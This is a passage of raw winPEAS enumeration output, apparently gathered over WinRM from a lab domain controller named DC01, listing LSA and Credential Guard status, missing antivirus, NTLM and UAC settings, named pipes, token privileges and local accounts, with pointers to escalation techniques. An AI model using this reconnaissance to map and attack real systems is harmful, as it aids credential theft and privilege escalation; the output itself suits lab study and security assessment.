WINRM       172.16.55.128   5985   DC01             È If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#lsa-protection
139
WINRM       172.16.55.128   5985   DC01                 LSA Protection is not enabled
140
WINRM       172.16.55.128   5985   DC01
141
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Credentials Guard
142
WINRM       172.16.55.128   5985   DC01             È If enabled, a driver is needed to read LSASS memory https://book.hacktricks.wiki/windows-hardening/stealing-credentials/credentials-protections#credentials-guard
143
WINRM       172.16.55.128   5985   DC01                 CredentialGuard is not enabled
144
WINRM       172.16.55.128   5985   DC01
145
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Cached Creds
146
WINRM       172.16.55.128   5985   DC01             È If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#cached-credentials
147
WINRM       172.16.55.128   5985   DC01                 cachedlogonscount is 10
148
WINRM       172.16.55.128   5985   DC01
149
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating saved credentials in Registry (CurrentPass)
150
WINRM       172.16.55.128   5985   DC01
151
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ AV Information
152
WINRM       172.16.55.128   5985   DC01               [X] Exception: Invalid namespace
153
WINRM       172.16.55.128   5985   DC01                 No AV was detected!!
154
WINRM       172.16.55.128   5985   DC01                 Not Found
155
WINRM       172.16.55.128   5985   DC01
156
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Windows Defender configuration
157
WINRM       172.16.55.128   5985   DC01               Local Settings
158
WINRM       172.16.55.128   5985   DC01               Group Policy Settings
159
WINRM       172.16.55.128   5985   DC01
160
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ UAC Status
161
WINRM       172.16.55.128   5985   DC01             È If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#from-administrator-medium-to-high-integrity-level--uac-bypasss
162
WINRM       172.16.55.128   5985   DC01                 ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
163
WINRM       172.16.55.128   5985   DC01                 EnableLUA: 1
164
WINRM       172.16.55.128   5985   DC01                 LocalAccountTokenFilterPolicy:
165
WINRM       172.16.55.128   5985   DC01                 FilterAdministratorToken:
166
WINRM       172.16.55.128   5985   DC01                   [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
167
WINRM       172.16.55.128   5985   DC01                   [-] Only the RID-500 local admin account can be used for lateral movement.
168
WINRM       172.16.55.128   5985   DC01
169
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ PowerShell Settings
170
WINRM       172.16.55.128   5985   DC01                 PowerShell v2 Version: 2.0
171
WINRM       172.16.55.128   5985   DC01                 PowerShell v5 Version: 5.1.20348.1
172
WINRM       172.16.55.128   5985   DC01                 PowerShell Core Version:
173
WINRM       172.16.55.128   5985   DC01                 Transcription Settings:
174
WINRM       172.16.55.128   5985   DC01                 Module Logging Settings:
175
WINRM       172.16.55.128   5985   DC01                 Scriptblock Logging Settings:
176
WINRM       172.16.55.128   5985   DC01                 PS history file:
177
WINRM       172.16.55.128   5985   DC01                 PS history size:
178
WINRM       172.16.55.128   5985   DC01
179
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating PowerShell Session Settings using the registry
180
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
181
WINRM       172.16.55.128   5985   DC01
182
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ PS default transcripts history
183
WINRM       172.16.55.128   5985   DC01             È Read the PS history inside these files (if any)
184
WINRM       172.16.55.128   5985   DC01
185
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ HKCU Internet Settings
186
WINRM       172.16.55.128   5985   DC01                 CertificateRevocation: 1
187
WINRM       172.16.55.128   5985   DC01                 DisableCachingOfSSLPages: 0
188
WINRM       172.16.55.128   5985   DC01                 IE5_UA_Backup_Flag: 5.0
189
WINRM       172.16.55.128   5985   DC01                 PrivacyAdvanced: 1
190
WINRM       172.16.55.128   5985   DC01                 SecureProtocols: 10240
191
WINRM       172.16.55.128   5985   DC01                 User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
192
WINRM       172.16.55.128   5985   DC01                 ZonesSecurityUpgrade: System.Byte[]
193
WINRM       172.16.55.128   5985   DC01
194
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ HKLM Internet Settings
195
WINRM       172.16.55.128   5985   DC01                 ActiveXCache: C:\Windows\Downloaded Program Files
196
WINRM       172.16.55.128   5985   DC01                 CodeBaseSearchPath: CODEBASE
197
WINRM       172.16.55.128   5985   DC01                 EnablePunycode: 1
198
WINRM       172.16.55.128   5985   DC01                 MinorVersion: 0
199
WINRM       172.16.55.128   5985   DC01                 WarnOnIntranet: 1
200
WINRM       172.16.55.128   5985   DC01
201
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Drives Information
202
WINRM       172.16.55.128   5985   DC01             È Remember that you should search more info inside the other drives
203
WINRM       172.16.55.128   5985   DC01                 C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 41 GB)(Permissions: Users [Allow: AppendData/CreateDirectories])
204
WINRM       172.16.55.128   5985   DC01
205
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking WSUS
206
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wsus
207
WINRM       172.16.55.128   5985   DC01                 Not Found
208
WINRM       172.16.55.128   5985   DC01
209
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking KrbRelayUp
210
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#krbrelayup
211
WINRM       172.16.55.128   5985   DC01               The system is inside a domain (LOOKBACK) so it could be vulnerable.
212
WINRM       172.16.55.128   5985   DC01             È You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
213
WINRM       172.16.55.128   5985   DC01
214
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking If Inside Container
215
WINRM       172.16.55.128   5985   DC01             È If the binary cexecsvc.exe or associated service exists, you are inside Docker
216
WINRM       172.16.55.128   5985   DC01             You are NOT inside a container
217
WINRM       172.16.55.128   5985   DC01
218
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking AlwaysInstallElevated
219
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated
220
WINRM       172.16.55.128   5985   DC01                 AlwaysInstallElevated isn't available
221
WINRM       172.16.55.128   5985   DC01
222
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerate LSA settings - auth packages included
223
WINRM       172.16.55.128   5985   DC01
224
WINRM       172.16.55.128   5985   DC01                 auditbasedirectories                 :       0
225
WINRM       172.16.55.128   5985   DC01                 auditbaseobjects                     :       0
226
WINRM       172.16.55.128   5985   DC01                 Bounds                               :       00-30-00-00-00-20-00-00
227
WINRM       172.16.55.128   5985   DC01                 crashonauditfail                     :       0
228
WINRM       172.16.55.128   5985   DC01                 fullprivilegeauditing                :       00
229
WINRM       172.16.55.128   5985   DC01                 LimitBlankPasswordUse                :       1
230
WINRM       172.16.55.128   5985   DC01                 NoLmHash                             :       1
231
WINRM       172.16.55.128   5985   DC01                 Security Packages                    :       ""
232
WINRM       172.16.55.128   5985   DC01                 Notification Packages                :       rassfm,scecli
233
WINRM       172.16.55.128   5985   DC01                 Authentication Packages              :       msv1_0
234
WINRM       172.16.55.128   5985   DC01                 LsaPid                               :       652
235
WINRM       172.16.55.128   5985   DC01                 LsaCfgFlagsDefault                   :       0
236
WINRM       172.16.55.128   5985   DC01                 SecureBoot                           :       1
237
WINRM       172.16.55.128   5985   DC01                 ProductType                          :       7
238
WINRM       172.16.55.128   5985   DC01                 disabledomaincreds                   :       0
239
WINRM       172.16.55.128   5985   DC01                 everyoneincludesanonymous            :       0
240
WINRM       172.16.55.128   5985   DC01                 forceguest                           :       0
241
WINRM       172.16.55.128   5985   DC01                 restrictanonymous                    :       0
242
WINRM       172.16.55.128   5985   DC01                 restrictanonymoussam                 :       1
243
WINRM       172.16.55.128   5985   DC01
244
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating NTLM Settings
245
WINRM       172.16.55.128   5985   DC01               LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default)
246
WINRM       172.16.55.128   5985   DC01
247
WINRM       172.16.55.128   5985   DC01
248
WINRM       172.16.55.128   5985   DC01               NTLM Signing Settings
249
WINRM       172.16.55.128   5985   DC01                   ClientRequireSigning    : False
250
WINRM       172.16.55.128   5985   DC01                   ClientNegotiateSigning  : True
251
WINRM       172.16.55.128   5985   DC01                   ServerRequireSigning    : True
252
WINRM       172.16.55.128   5985   DC01                   ServerNegotiateSigning  : True
253
WINRM       172.16.55.128   5985   DC01                   LdapSigning             : Negotiate signing (Negotiate signing)
254
WINRM       172.16.55.128   5985   DC01
255
WINRM       172.16.55.128   5985   DC01               Session Security
256
WINRM       172.16.55.128   5985   DC01                   NTLMMinClientSec        : 536870912 (Require 128-bit encryption)
257
WINRM       172.16.55.128   5985   DC01                   NTLMMinServerSec        : 536870912 (Require 128-bit encryption)
258
WINRM       172.16.55.128   5985   DC01
259
WINRM       172.16.55.128   5985   DC01
260
WINRM       172.16.55.128   5985   DC01               NTLM Auditing and Restrictions
261
WINRM       172.16.55.128   5985   DC01                   InboundRestrictions     :  (Not defined)
262
WINRM       172.16.55.128   5985   DC01                   OutboundRestrictions    :  (Not defined)
263
WINRM       172.16.55.128   5985   DC01                   InboundAuditing         :  (Not defined)
264
WINRM       172.16.55.128   5985   DC01                   OutboundExceptions      :
265
WINRM       172.16.55.128   5985   DC01
266
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Display Local Group Policy settings - local users/machine
267
WINRM       172.16.55.128   5985   DC01
268
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Potential GPO abuse vectors (applied domain GPOs writable by current user)
269
WINRM       172.16.55.128   5985   DC01                 No obvious GPO abuse via writable SYSVOL paths or GPCO membership detected.
270
WINRM       172.16.55.128   5985   DC01
271
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking AppLocker effective policy
272
WINRM       172.16.55.128   5985   DC01                AppLockerPolicy version: 1
273
WINRM       172.16.55.128   5985   DC01                listing rules:
274
WINRM       172.16.55.128   5985   DC01
275
WINRM       172.16.55.128   5985   DC01
276
WINRM       172.16.55.128   5985   DC01
277
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Printers (WMI)
278
WINRM       172.16.55.128   5985   DC01
279
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Named Pipes
280
WINRM       172.16.55.128   5985   DC01               Name                                                                                                 CurrentUserPerms                                                       Sddl
281
WINRM       172.16.55.128   5985   DC01
282
WINRM       172.16.55.128   5985   DC01               eventlog                                                                                             Everyone [Allow: WriteData/CreateFiles]                                O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
283
WINRM       172.16.55.128   5985   DC01
284
WINRM       172.16.55.128   5985   DC01               RpcProxy\49677                                                                                       Everyone [Allow: WriteData/CreateFiles]                                O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)
285
WINRM       172.16.55.128   5985   DC01
286
WINRM       172.16.55.128   5985   DC01               RpcProxy\593                                                                                         Everyone [Allow: WriteData/CreateFiles]                                O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)
287
WINRM       172.16.55.128   5985   DC01
288
WINRM       172.16.55.128   5985   DC01               sql\query                                                                                            Everyone [Allow: WriteData/CreateFiles]                                O:S-1-5-21-3830242231-3868280746-2763890440-1106G:DUD:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-3830242231-3868280746-2763890440-1106)
289
WINRM       172.16.55.128   5985   DC01
290
WINRM       172.16.55.128   5985   DC01               SQLLocal\MSSQLSERVER                                                                                 Everyone [Allow: WriteData/CreateFiles]                                O:S-1-5-21-3830242231-3868280746-2763890440-1106G:DUD:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-3830242231-3868280746-2763890440-1106)
291
WINRM       172.16.55.128   5985   DC01
292
WINRM       172.16.55.128   5985   DC01               vgauth-service                                                                                       Everyone [Allow: WriteData/CreateFiles]                                O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
293
WINRM       172.16.55.128   5985   DC01
294
WINRM       172.16.55.128   5985   DC01
295
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating AMSI registered providers
296
WINRM       172.16.55.128   5985   DC01
297
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Sysmon configuration
298
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
299
WINRM       172.16.55.128   5985   DC01
300
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Sysmon process creation logs (1)
301
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
302
WINRM       172.16.55.128   5985   DC01
303
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Installed .NET versions
304
WINRM       172.16.55.128   5985   DC01
305
WINRM       172.16.55.128   5985   DC01
306
WINRM       172.16.55.128   5985   DC01
307
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Interesting Events information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
308
WINRM       172.16.55.128   5985   DC01
309
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Printing Explicit Credential Events (4648) for last 30 days - A process logged on using plaintext credentials
310
WINRM       172.16.55.128   5985   DC01
311
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
312
WINRM       172.16.55.128   5985   DC01
313
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Printing Account Logon Events (4624) for the last 10 days.
314
WINRM       172.16.55.128   5985   DC01
315
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
316
WINRM       172.16.55.128   5985   DC01
317
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Process creation events - searching logs (EID 4688) for sensitive data.
318
WINRM       172.16.55.128   5985   DC01
319
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
320
WINRM       172.16.55.128   5985   DC01
321
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ PowerShell events - script block logs (EID 4104) - searching for sensitive data.
322
WINRM       172.16.55.128   5985   DC01
323
WINRM       172.16.55.128   5985   DC01               [X] Exception: Attempted to perform an unauthorized operation.
324
WINRM       172.16.55.128   5985   DC01
325
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Displaying Power off/on events for last 5 days
326
WINRM       172.16.55.128   5985   DC01
327
WINRM       172.16.55.128   5985   DC01             System.UnauthorizedAccessException: Attempted to perform an unauthorized operation.
328
WINRM       172.16.55.128   5985   DC01                at System.Diagnostics.Eventing.Reader.EventLogException.Throw(Int32 errorCode)
329
WINRM       172.16.55.128   5985   DC01                at System.Diagnostics.Eventing.Reader.NativeWrapper.EvtQuery(EventLogHandle session, String path, String query, Int32 flags)
330
WINRM       172.16.55.128   5985   DC01                at System.Diagnostics.Eventing.Reader.EventLogReader..ctor(EventLogQuery eventQuery, EventBookmark bookmark)
331
WINRM       172.16.55.128   5985   DC01                at winPEAS.Helpers.MyUtils.GetEventLogReader(String path, String query, String computerName)
332
WINRM       172.16.55.128   5985   DC01                at winPEAS.Info.EventsInfo.Power.Power.<GetPowerEventInfos>d__0.MoveNext()
333
WINRM       172.16.55.128   5985   DC01                at winPEAS.Checks.EventsInfo.PowerOnEvents()
334
WINRM       172.16.55.128   5985   DC01
335
WINRM       172.16.55.128   5985   DC01
336
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Users Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
337
WINRM       172.16.55.128   5985   DC01
338
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Users
339
WINRM       172.16.55.128   5985   DC01             È Check if you have some admin equivalent privileges https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#users--groups
340
WINRM       172.16.55.128   5985   DC01               [X] Exception: Object reference not set to an instance of an object.
341
WINRM       172.16.55.128   5985   DC01               Current user: administrator
342
WINRM       172.16.55.128   5985   DC01               Current groups: Domain Users, Everyone, Builtin\Remote Management Users, Users, Builtin\Pre-Windows 2000 Compatible Access, Builtin\Certificate Service DCOM Access, Network, Authenticated Users, This Organization, IT, NTLM Authentication
343
WINRM       172.16.55.128   5985   DC01                =================================================================================================
344
WINRM       172.16.55.128   5985   DC01
345
WINRM       172.16.55.128   5985   DC01                 Not Found
346
WINRM       172.16.55.128   5985   DC01
347
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Current User Idle Time
348
WINRM       172.16.55.128   5985   DC01                Current User   :     LOOKBACK\administrator
349
WINRM       172.16.55.128   5985   DC01                Idle Time      :     03h:26m:17s:156ms
350
WINRM       172.16.55.128   5985   DC01
351
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Display Tenant information (DsRegCmd.exe /status)
352
WINRM       172.16.55.128   5985   DC01                Tenant is NOT Azure AD Joined.
353
WINRM       172.16.55.128   5985   DC01
354
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Current Token privileges
355
WINRM       172.16.55.128   5985   DC01             È Check if you can escalate privilege using some enabled token https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#token-manipulation
356
WINRM       172.16.55.128   5985   DC01                 SeMachineAccountPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
357
WINRM       172.16.55.128   5985   DC01                 SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
358
WINRM       172.16.55.128   5985   DC01                 SeIncreaseWorkingSetPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
359
WINRM       172.16.55.128   5985   DC01
360
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Clipboard text
361
WINRM       172.16.55.128   5985   DC01
362
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Logged users
363
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access denied
364
WINRM       172.16.55.128   5985   DC01                 Not Found
365
WINRM       172.16.55.128   5985   DC01
366
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Display information about local users
367
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
368
WINRM       172.16.55.128   5985   DC01                User Name               :   Administrator
369
WINRM       172.16.55.128   5985   DC01                User Id                 :   500
370
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
371
WINRM       172.16.55.128   5985   DC01                User Type               :   Administrator
372
WINRM       172.16.55.128   5985   DC01                Comment                 :   Built-in account for administering the computer/domain
373
WINRM       172.16.55.128   5985   DC01                Last Logon              :   4/7/2026 7:37:27 PM
374
WINRM       172.16.55.128   5985   DC01                Logons Count            :   14
375
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/17/2025 11:08:02 AM
376
WINRM       172.16.55.128   5985   DC01
377
WINRM       172.16.55.128   5985   DC01                =================================================================================================
378
WINRM       172.16.55.128   5985   DC01
379
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
380
WINRM       172.16.55.128   5985   DC01                User Name               :   Guest
381
WINRM       172.16.55.128   5985   DC01                User Id                 :   501
382
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   False
383
WINRM       172.16.55.128   5985   DC01                User Type               :   Guest
384
WINRM       172.16.55.128   5985   DC01                Comment                 :   Built-in account for guest access to the computer/domain
385
WINRM       172.16.55.128   5985   DC01                Last Logon              :   1/1/1970 12:00:00 AM
386
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
387
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   1/1/1970 12:00:00 AM
388
WINRM       172.16.55.128   5985   DC01
389
WINRM       172.16.55.128   5985   DC01                =================================================================================================
390
WINRM       172.16.55.128   5985   DC01
391
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
392
WINRM       172.16.55.128   5985   DC01                User Name               :   krbtgt
393
WINRM       172.16.55.128   5985   DC01                User Id                 :   502
394
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   False
395
WINRM       172.16.55.128   5985   DC01                User Type               :   User
396
WINRM       172.16.55.128   5985   DC01                Comment                 :   Key Distribution Center Service Account
397
WINRM       172.16.55.128   5985   DC01                Last Logon              :   1/1/1970 12:00:00 AM
398
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
399
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/16/2025 8:15:35 PM
400
WINRM       172.16.55.128   5985   DC01
401
WINRM       172.16.55.128   5985   DC01                =================================================================================================
402
WINRM       172.16.55.128   5985   DC01
403
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
404
WINRM       172.16.55.128   5985   DC01                User Name               :   hank
405
WINRM       172.16.55.128   5985   DC01                User Id                 :   1104
406
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
407
WINRM       172.16.55.128   5985   DC01                User Type               :   User
408
WINRM       172.16.55.128   5985   DC01                Comment                 :
409
WINRM       172.16.55.128   5985   DC01                Last Logon              :   1/1/1970 12:00:00 AM
410
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
411
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/19/2025 5:05:12 AM
412
WINRM       172.16.55.128   5985   DC01
413
WINRM       172.16.55.128   5985   DC01                =================================================================================================
414
WINRM       172.16.55.128   5985   DC01
415
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
416
WINRM       172.16.55.128   5985   DC01                User Name               :   lookback-admin
417
WINRM       172.16.55.128   5985   DC01                User Id                 :   1105
418
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
419
WINRM       172.16.55.128   5985   DC01                User Type               :   User
420
WINRM       172.16.55.128   5985   DC01                Comment                 :
421
WINRM       172.16.55.128   5985   DC01                Last Logon              :   10/19/2025 5:48:29 AM
422
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
423
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/19/2025 5:11:25 AM
424
WINRM       172.16.55.128   5985   DC01
425
WINRM       172.16.55.128   5985   DC01                =================================================================================================
426
WINRM       172.16.55.128   5985   DC01
427
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
428
WINRM       172.16.55.128   5985   DC01                User Name               :   db-admin
429
WINRM       172.16.55.128   5985   DC01                User Id                 :   1106
430
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
431
WINRM       172.16.55.128   5985   DC01                User Type               :   User
432
WINRM       172.16.55.128   5985   DC01                Comment                 :
433
WINRM       172.16.55.128   5985   DC01                Last Logon              :   4/10/2026 8:51:59 PM
434
WINRM       172.16.55.128   5985   DC01                Logons Count            :   16
435
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/19/2025 5:15:44 AM
436
WINRM       172.16.55.128   5985   DC01
437
WINRM       172.16.55.128   5985   DC01                =================================================================================================
438
WINRM       172.16.55.128   5985   DC01
439
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
440
WINRM       172.16.55.128   5985   DC01                User Name               :   Service_Maintainer
441
WINRM       172.16.55.128   5985   DC01                User Id                 :   1107
442
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
443
WINRM       172.16.55.128   5985   DC01                User Type               :   User
444
WINRM       172.16.55.128   5985   DC01                Comment                 :
445
WINRM       172.16.55.128   5985   DC01                Last Logon              :   1/1/1970 12:00:00 AM
446
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
447
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/19/2025 6:27:26 AM
448
WINRM       172.16.55.128   5985   DC01
449
WINRM       172.16.55.128   5985   DC01                =================================================================================================
450
WINRM       172.16.55.128   5985   DC01
451
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
452
WINRM       172.16.55.128   5985   DC01                User Name               :   IT-SEC-admin
453
WINRM       172.16.55.128   5985   DC01                User Id                 :   1110
454
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
455
WINRM       172.16.55.128   5985   DC01                User Type               :   User
456
WINRM       172.16.55.128   5985   DC01                Comment                 :
457
WINRM       172.16.55.128   5985   DC01                Last Logon              :   4/10/2026 10:37:35 PM
458
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
459
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/19/2025 7:11:48 AM
460
WINRM       172.16.55.128   5985   DC01
461
WINRM       172.16.55.128   5985   DC01                =================================================================================================
462
WINRM       172.16.55.128   5985   DC01
463
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
464
WINRM       172.16.55.128   5985   DC01                User Name               :   IT-admin
465
WINRM       172.16.55.128   5985   DC01                User Id                 :   1111
466
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
467
WINRM       172.16.55.128   5985   DC01                User Type               :   User
468
WINRM       172.16.55.128   5985   DC01                Comment                 :
469
WINRM       172.16.55.128   5985   DC01                Last Logon              :   4/10/2026 11:38:55 PM
470
WINRM       172.16.55.128   5985   DC01                Logons Count            :   3
471
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   4/10/2026 11:35:00 PM
472
WINRM       172.16.55.128   5985   DC01
473
WINRM       172.16.55.128   5985   DC01                =================================================================================================
474
WINRM       172.16.55.128   5985   DC01
475
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
476
WINRM       172.16.55.128   5985   DC01                User Name               :   administrator
477
WINRM       172.16.55.128   5985   DC01                User Id                 :   1112
478
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
479
WINRM       172.16.55.128   5985   DC01                User Type               :   User
480
WINRM       172.16.55.128   5985   DC01                Comment                 :
481
WINRM       172.16.55.128   5985   DC01                Last Logon              :   4/10/2026 11:08:39 PM
482
WINRM       172.16.55.128   5985   DC01                Logons Count            :   4
483
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   4/10/2026 10:42:35 PM
484
WINRM       172.16.55.128   5985   DC01
485
WINRM       172.16.55.128   5985   DC01                =================================================================================================
486
WINRM       172.16.55.128   5985   DC01
487
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
488
WINRM       172.16.55.128   5985   DC01                User Name               :   IT-email-admin
489
WINRM       172.16.55.128   5985   DC01                User Id                 :   1113
490
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
491
WINRM       172.16.55.128   5985   DC01                User Type               :   User
492
WINRM       172.16.55.128   5985   DC01                Comment                 :
493
WINRM       172.16.55.128   5985   DC01                Last Logon              :   1/1/1970 12:00:00 AM
494
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
495
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/19/2025 7:20:21 AM
496
WINRM       172.16.55.128   5985   DC01
497
WINRM       172.16.55.128   5985   DC01                =================================================================================================
498
WINRM       172.16.55.128   5985   DC01
499
WINRM       172.16.55.128   5985   DC01
500
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ RDP Sessions
501
WINRM       172.16.55.128   5985   DC01                 Not Found
502
WINRM       172.16.55.128   5985   DC01
503
